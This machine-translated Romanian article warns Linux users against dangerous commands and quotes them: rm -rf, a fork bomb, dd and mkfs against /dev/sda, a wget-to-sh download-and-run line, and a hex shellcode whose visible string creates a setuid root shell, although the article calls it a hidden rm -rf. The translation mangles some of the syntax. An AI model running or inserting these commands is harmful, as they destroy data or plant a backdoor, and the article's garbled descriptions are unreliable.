Ei bine, dacă ați folosit vreodată un sistem de operare Linux, atunci s-ar putea să știți că platforma este mai independentă decât Windows. Linux este un sistem de operare open-source și oferă utilizatorilor suficientă libertate pentru a efectua diferite operațiuni. Cu toate acestea, pentru utilizatorii pentru prima dată, operarea Linux ar putea fi o sarcină dificilă.
La fel ca pe Windows, Linux are, de asemenea, o mulțime de comenzi de terminal pentru a efectua operațiuni diferite. Cu toate acestea, spre deosebire de Windows, Linux nu vă va cere confirmarea dacă executați orice comandă care ar putea deteriora sistemul. Așadar, vă recomandăm să nu utilizați aceste comenzi cu orice preț.
Deci, în acest articol, vom împărtăși unele dintre comenzile periculoase Linux pe care nu ar trebui să le rulați niciodată pe Linux. Deci, haideți să verificăm comenzile mortale pe care nu ar trebui să le executați niciodată pe un computer Linux.
rm -rf
Comanda rm -rf este una dintre cele mai rapide modalități de a șterge un folder și conținutul acestuia. Dar o mică eroare de tastare sau ignoranță poate duce la deteriorarea nerecuperabilă a sistemului. Unele dintre opțiunile utilizate cu comanda rm sunt cum ar fi comanda Rm -r șterge dosarul recursiv, chiar și folderul gol. Comanda rm -f elimină „citiți doar fișierul‘ fără să întrebați. De asemenea, are puterea de a elimina toate fișierele prezente în directorul rădăcină.
: () {: |: &} ;:
Comanda de mai sus este bomba furcă. Funcționează definind o funcție numită ”, care se numește de două ori, o dată în prim-plan și o dată în fundal. Funcționează din nou și din nou până când sistemul îngheță.
comanda> / dev / sda
Comanda de mai sus scrie ieșirea din „comandă pe bloc / dev / sda. Comanda de mai sus scrie date brute și toate fișierele din bloc vor fi înlocuite cu date brute, rezultând pierderea totală a datelor din bloc.
directorul mv / dev / null
Această comandă mută practic toate fișierele în / dev / null, da, înseamnă că pur și simplu dispar toate fișierele din sistem.
wget http: // malicious_source -O | SH
Comanda de mai sus va descărca un script dintr-o sursă rău intenționată și apoi îl va rula pe sistemul dvs. Comanda Wget va descărca scriptul și comanda sh va rula scriptul descărcat pe sistemul dvs.
Mkfs.ext3 / dev / sda
Comanda de mai sus va formata pur și simplu blocul ‘sda’ și cu siguranță veți ști că după executarea comenzii de mai sus Blocul (Hard Disk Drive) va fi resetat la NOU! Fără date, lăsând sistemul într-o fază nerecuperabilă.
> Fișier
Comanda de mai sus este utilizată pentru a elibera conținutul fișierului. Dacă comanda de mai sus este executată cu o eroare de tastare sau ignoranță, deoarece „> xt.conf” va scrie fișierul de configurare sau orice alt sistem sau fișier de configurare.
^ foo ^ bar
Această comandă este utilizată pentru a edita comanda anterioară fără a fi nevoie să retipezi din nou întreaga comandă. Dar poate fi cu adevărat problematic dacă nu vă asumați riscul să verificați cu atenție modificarea comenzii originale folosind comanda ^ ^ foo bar.
dd if = / dev / random of = / dev / sda
Comanda de mai sus se va termina ca / dev / sda și va scrie date aleatorii pentru bloc. Desigur! Sistemul dvs. ar fi lăsat într-o fază inconsecventă și nerecuperabilă.
Comanda invizibilă
Următoarea comandă nu este altceva decât prima comandă a acestui articol (rm-rf). Aici codurile sunt ascunse în hexagon, pentru ca un utilizator ignorant să poată fi păcălit. Rulați codul de mai jos în terminal și ștergeți partiția rădăcină.
Această comandă arată că amenințarea poate fi ascunsă și, de obicei, nedetectabilă uneori. Ar trebui să fii conștient de ceea ce faci și care ar fi rezultatul. Nu compilați / rulați codul dintr-o sursă necunoscută.
char esp [] __attribute__ ((secțiunea („. text”))) / * versiunea e.s.p * / = „\ xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ x83 \ xec \ x64 \ x68 ″ „\ Xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99 ″“ \ xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7 ″ „\ X56 \ x04 \ xf7 \ x56 \ x08 \ xf7 \ x56 \ x0c \ x83 \ xc4 \ x74 \ x56 ″“ \ x8d \ x73 \ x08 \ x56 \ x53 \ x54 \ x59 \ xb0 \ x0b \ xcd \ x80 \ x31 ″ „\ Xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69 ″“ \ x6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00 ″ “cp -p / bin / sh /tmp/.beyond; chmod 4755 /tmp/.beyond; ”;
Deci, acestea sunt câteva dintre comenzile periculoase Linux pe care ar trebui să le evitați. Nu ar trebui să executați această comandă cu orice preț. Sper că acest articol te-a ajutat! Împărtășiți-l și prietenilor dvs.